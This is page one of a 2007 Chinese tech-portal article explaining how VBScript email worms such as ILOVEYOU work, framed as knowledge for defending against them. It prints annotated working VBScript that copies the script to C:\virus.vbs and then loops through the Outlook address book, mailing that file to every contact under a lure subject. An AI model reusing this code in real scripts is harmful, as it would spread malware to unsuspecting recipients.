新闻 | 天津 | 民生 | 广电 | 津抖云 | 微视 | 读图 | 文娱 | 体育 | 图事 | 理论 | 志愿 | 专题 | 工作室 | 不良信息举报
教育 | 健康 | 财经 | 地产 | 天津通 | 旅游 | 时尚 | 购物 | 汽车 | IT | 亲子 | 会计 | 访谈 | 场景秀 | 发布系统

"津云"客户端
  您当前的位置 :北方网 > IT浪潮 > 北方学院 > 软件文库 > 网络相关 正文
关键词:

活活把它给解剖了 实例解析蠕虫病毒的原理


http://www.enorth.com.cn  2007-04-13 12:58

  如今对大家的电脑威胁最大的就属网络蠕虫病毒了!网络蠕虫病毒的危害之大简直令人吃惊,从大名鼎鼎的“爱虫”到“欢乐时光”,再到“红色代码”,其破坏力越来越强,因此我们有必要了解网络蠕虫病毒。

  蠕虫病毒与一般的计算机病毒不同,它不采用将自身拷贝附加到其他程序中的方式来复制自己,所以在病毒中它也算是一个“另类”。蠕虫病毒的破坏性很强,部分蠕虫病毒不仅可以在因特网上兴风作浪,局域网也成了它们“施展身手”的舞台――蠕虫病毒可以潜伏在基于客户机/服务机模式的局域网的服务机上的软件内,当客户机访问服务机,并对有毒的软件实施下载后,病毒就神不知、鬼不觉地从服务机上“拷贝”到客户机上了。

  其实脚本病毒是很容易制造的,它们都利用了视窗系统的开放性的特点。特别是COM到COM+的组件编程思路,一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒(如欢乐时光、 I Love You 、库尔尼科娃病毒、Homepage病毒等)为例,他们都是把.vbs脚本文件添在附件中,最后使用*.htm.vbs等欺骗性的文件名。下面我们详细了解一下蠕虫病毒的几大特性,从中找到对付蠕虫病毒的方法。

  一、蠕虫病毒具有自我复制能力

  我们以普通的VB脚本为例来看看:

  Set objFs=CreateObject ("Scripting.FileSystemObject")

    创建一个文件系统对象

  objFs.CreateTextFile ("C:\virus.txt", 1)

  通过文件系统对象的方法创建了一个TXT文件

  如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为:

  objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")

  就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我复制的功能,已经具备病毒的基本特征――自我复制能力。

  二、蠕虫病毒具有很强的传播性

  病毒需要传播,电子邮件病毒的传播无疑是通过电子邮件传播的。对于OutLook来说地址簿的功能相当不错,可是也给病毒的传播打开了方便之门。几乎所有通过OutLook传播的电子邮件病毒都是向地址簿中存储的电子邮件地址发送内同相同的脚本附件完成的。看看如下的代码:

  Set objOA=Wscript.CreateObject ("Outlook.Application")

  创建一个OUTLOOK应用的对象

  Set objMapi=objOA.GetNameSpace ("MAPI")

  取得MAPI名字空间

  For i=1 to objMapi.AddressLists.Count

  遍历地址簿

  Set objAddList=objMapi.AddressLists (i)

  For j=1 To objAddList. AddressEntries.Count

  Set objMail=objOA.CreateItem (0)

  objMail.Recipients.Add (objAddList. AddressEntries (j))

  取得收件人邮件地址

  objMail.Subject=“你好!”

  设置邮件主题

  objMail.Body=“这次给你的附件,是我的新文档!”

  设置信件内容

  objMail.Attachments.Add ("c:\virus.vbs")

  把自己作为附件扩散出去

  objMail.Send

  发送邮件

  Next

  Next

  Set objMapi=Nothing

  清空objMapi变量,释放资源,值得学习的编程习惯。

  Set objOA=Nothing

  清空objOA变量

  这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自己作为附件扩散出去。这段代码中的第一行是创建一个Outlook的对象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中的电子邮件地址发送内容相同的信件。蠕虫病毒就是这样进行传播的。

 [1] [2] 下一页
编辑 刘静
[进入IT论坛]
九大技巧教你去除电子邮件类病毒
“MSN照片”病毒疯狂传播 数百台PC已被感染
电脑病毒作者挑衅杀毒软件 扬言年内买宝马轿车
新病毒模仿熊猫烧香 利用Vista漏洞传播
请您文明上网、理性发言并遵守相关规定,在注册后发表评论。
 北方网精彩内容推荐
无标题文档
天津民生资讯
天气交通 天津福彩 每月影讯 二手市场
空气质量 天津股票 广播节目 二手房源
失物招领 股市大擂台 天视节目 每日房价
热点专题
北京奥运圣火传递和谐之旅 迎奥运 讲文明 树新风
解放思想 干事创业 科学发展 同在一方热土 共建美好家园
2008天津夏季达沃斯论坛 《今日股市观察》视频
北方网网络相声频道在线收听 2008高考招生简章 复习冲刺
天津自然博物馆馆藏精品展示 2008年天津中考问题解答
带你了解08春夏服饰流行趋势 完美塑身 舞动肚皮舞(视频)
C-NCAP碰撞试验—雪佛兰景程 特殊时期善待自己 孕期检查
热点新闻排行 财经 体育 娱乐 汽车 IT 时尚 健康 教育

Copyright (C) 2000-2021 Enorth.com.cn, Tianjin ENORTH NETNEWS Co.,LTD.All rights reserved
本网站由天津北方网版权所有